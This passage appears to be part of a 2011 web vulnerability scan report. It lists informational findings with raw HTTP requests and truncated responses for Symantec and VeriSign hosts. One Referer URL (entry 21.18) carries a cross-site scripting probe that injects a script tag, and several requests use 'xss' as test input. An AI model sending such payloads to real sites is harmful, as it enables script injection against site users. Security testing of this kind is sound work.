21.15. https://fileconnect.symantec.com/
Summary
Severity: Information
Confidence: Certain
Host: https://fileconnect.symantec.com
Path: /
Request
GET / HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B; JSESSIONID=V38gTqNQLHyLm2TQTSMmQ38tfyv2QBbTyZ1rpHfBJgYXTJS8hLvS!1676143451
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:04:07 GMT Content-length: 11587 Content-type: text/html Content-Language: en-US <HTML><HEAD><TITLE>Symantec FileConnect - Electronic Software Distribution</TITLE> <!--[if IE]> <LINK REL=StyleSheet HREF="javascript/stylesie.css" TYPE="text/css" MEDIA=screen> <![endif]...[SNIP]...
21.16. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer
Summary
Severity: Information
Confidence: Certain
Host: https://forms.verisign.com
Path: /websurveys/servlet/ActionMultiplexer
Request
GET /websurveys/servlet/ActionMultiplexer HTTP/1.1 Host: forms.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 36 Date: Fri, 09 Sep 2011 21:41:07 GMT Missing or unknown action ID: null
21.17. https://idprotect.verisign.com/common/scripts/dlText.js
Summary
Severity: Information
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /common/scripts/dlText.js
Request
GET /common/scripts/dlText.js HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/orderstart.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:50:57 GMT Accept-Ranges: bytes ETag: W/"19229-1310089722000" Last-Modified: Fri, 08 Jul 2011 01:48:42 GMT Content-Type: text/javascript Content-Length: 19229 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive linkData['DL_0'] = 'Supported Mobile Devices'; linkData['DL_1'] = 'Select Your Mobile Device'; linkData['DL_2'] = 'Why You Have To Download, Activate, and Register Your ' + brand_productname; linkData...[SNIP]...
21.18. https://idprotect.verisign.com/secureredirect.v
Summary
Severity: Information
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /secureredirect.v
Request
GET /secureredirect.v?sid=0.08982152305543423 HTTP/1.1 Host: idprotect.verisign.com Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/home.v?141ab%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E41143d22db1=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:51:44 GMT Content-Type: text/xml;charset=UTF-8 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 2195 <?xml version="1.0" encoding="UTF-8"?><document><redirectUrl>https://vipmobile.verisign.com/welcome.v</redirectUrl><timestamp>2011-09-09T21:51:44Z</timestamp><cert>-----BEGIN CERTIFICATE----- MIIEVzCC...[SNIP]...
21.19. https://idprotect.verisign.com/toolbar/downloadIE.v
Summary
Severity: Information
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /toolbar/downloadIE.v
Request
GET /toolbar/downloadIE.v HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/install.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:40 GMT Content-disposition: filename="VIPAccessToolbarSetup.exe" Content-Type: application/octet-stream Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 1936456 MZ......................@............................................. .!..L.!This program cannot be run in DOS mode. $........M4..,Z..,Z..,Z..0V..,Z.f3Q..,Z.0T..,Z.f3P..,Z.$...,Z..,[..,Z...Q..,Z....[SNIP]...
21.20. https://knowledge.verisign.ch/support/code-signing-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/code-signing-support/index.html
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.21. https://knowledge.verisign.ch/support/digital-id-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/digital-id-support/index.html
Request
GET /support/digital-id-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.22. https://knowledge.verisign.ch/support/mpki-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/mpki-support/index.html
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/ssl-certificates-support/index
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]...
21.24. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/ssl-certificates-support/index.html
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.25. https://knowledge.verisign.ch/support/trust-seal-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/trust-seal-support/index.html
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.26. https://knowledge.verisign.com/favicon.ico
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /favicon.ico
Request
GET /favicon.ico HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT ETag: "342ce-47e-4aac5f440a880" Accept-Ranges: bytes Content-Length: 1150 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/plain ............ .h.......(....... ..... .....@......................................>...........................................................q...................................9.........................[SNIP]...
21.27. https://knowledge.verisign.com/support/code-signing-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/code-signing-support/index
Request
GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:36 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]...
21.28. https://knowledge.verisign.com/support/code-signing-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/code-signing-support/index.html
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.29. https://knowledge.verisign.com/support/digital-id-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/digital-id-support/index.html
Request
GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.30. https://knowledge.verisign.com/support/eca-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/eca-support/index.html
Request
GET /support/eca-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.31. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-for-ssl-support/index
Request
GET /support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 17000 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]...
21.32. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-for-ssl-support/index.html
Request
GET /support/mpki-for-ssl-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:45:43 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.33. https://knowledge.verisign.com/support/mpki-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/mpki-support/index.html
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:41 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.34. https://knowledge.verisign.com/support/ssl-certificates-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/ssl-certificates-support/index
Request
GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 46210 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]...
21.35. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/ssl-certificates-support/index.html
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:57 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.36. https://knowledge.verisign.com/support/trust-seal-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.com
Path: /support/trust-seal-support/index.html
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.37. https://partnernet.symantec.com/
Summary
Severity: Information
Confidence: Certain
Host: https://partnernet.symantec.com
Path: /
Request
GET / HTTP/1.1 Host: partnernet.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:06 GMT Server: Apache/2.2.15 (Unix) Last-Modified: Thu, 12 May 2011 19:48:14 GMT ETag: "70c638-47-4a3197842db80" Accept-Ranges: bytes Content-Length: 71 Connection: close Content-Type: text/html <meta http-equiv="refresh" content="0; URL=/Partnercontent/Login.jsp">
21.38. https://policy3.responsys.net/
Summary
Severity: Information
Confidence: Certain
Host: https://policy3.responsys.net
Path: /
Request
GET / HTTP/1.1 Host: policy3.responsys.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:40:00 GMT Server: Apache Last-Modified: Wed, 19 May 2010 07:38:58 GMT ETag: "2ef9310-155-486ed8d030880" Accept-Ranges: bytes Content-Length: 341 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Permission Policy</title> <meta http-equiv="Refresh" content="0; URL=./permission.htm" <meta http-equiv="Content-Ty...[SNIP]...
21.39. https://policy3.responsys.net/permission.htm
Summary
Severity: Information
Confidence: Certain
Host: https://policy3.responsys.net
Path: /permission.htm
Request
GET /permission.htm HTTP/1.1 Host: policy3.responsys.net Connection: keep-alive Referer: https://policy3.responsys.net/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:40:00 GMT Server: Apache Last-Modified: Wed, 19 May 2010 07:38:58 GMT ETag: "2531311-130d-486ed8d030880" Accept-Ranges: bytes Content-Length: 4877 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Permission Policy</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> </head> <body b...[SNIP]...
21.40. https://policy3.responsys.net/privacy.htm
Summary
Severity: Information
Confidence: Certain
Host: https://policy3.responsys.net
Path: /privacy.htm
Request
GET /privacy.htm HTTP/1.1 Host: policy3.responsys.net Connection: keep-alive Referer: https://policy3.responsys.net/permission.htm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:40:06 GMT Server: Apache Last-Modified: Wed, 19 May 2010 07:38:58 GMT ETag: "1f21312-1bfd-486ed8d030880" Accept-Ranges: bytes Content-Length: 7165 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Responsys Privacy Policy</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> </head>...[SNIP]...
21.41. https://press.verisign.com/easyir/customrel.do
Summary
Severity: Information
Confidence: Certain
Host: https://press.verisign.com
Path: /easyir/customrel.do
Request
GET /easyir/customrel.do HTTP/1.1 Host: press.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: Servlet/3.0; JBossAS-6 Content-Length: 1286 Connection: close Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <!-- so that relative references will use absolute url from jsp and not from calling ...[SNIP]...
21.42. https://products.verisign.com/geocenter/reseller/doregister.do
Summary
Severity: Information
Confidence: Certain
Host: https://products.verisign.com
Path: /geocenter/reseller/doregister.do
Request
GET /geocenter/reseller/doregister.do?vatCountry= HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:19 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 8588 <html> <head> <title>Referring Partner Code Error</title> <link href="/geocenter/style.css" type=text/css rel="stylesheet"> <style type=...[SNIP]...
21.43. https://products.verisign.com/geocenter/reseller/logon.do
Summary
Severity: Information
Confidence: Certain
Host: https://products.verisign.com
Path: /geocenter/reseller/logon.do
Request
POST /geocenter/reseller/logon.do HTTP/1.1 Host: products.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false Content-Length: 40 Cache-Control: max-age=0 Origin: https://knowledge.verisign.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765 userName=xss&password=xss&submit=Sign+In
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:02 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17164 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]...
21.44. https://products.verisign.com/geocenter/reseller/logon.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://products.verisign.com
Path: /geocenter/reseller/logon.jsp
Request
GET /geocenter/reseller/logon.jsp HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:15 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17095 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]...
21.45. https://products.verisign.com/geocenter/reseller/register.do
Summary
Severity: Information
Confidence: Certain
Host: https://products.verisign.com
Path: /geocenter/reseller/register.do
Request
GET /geocenter/reseller/register.do HTTP/1.1 Host: products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
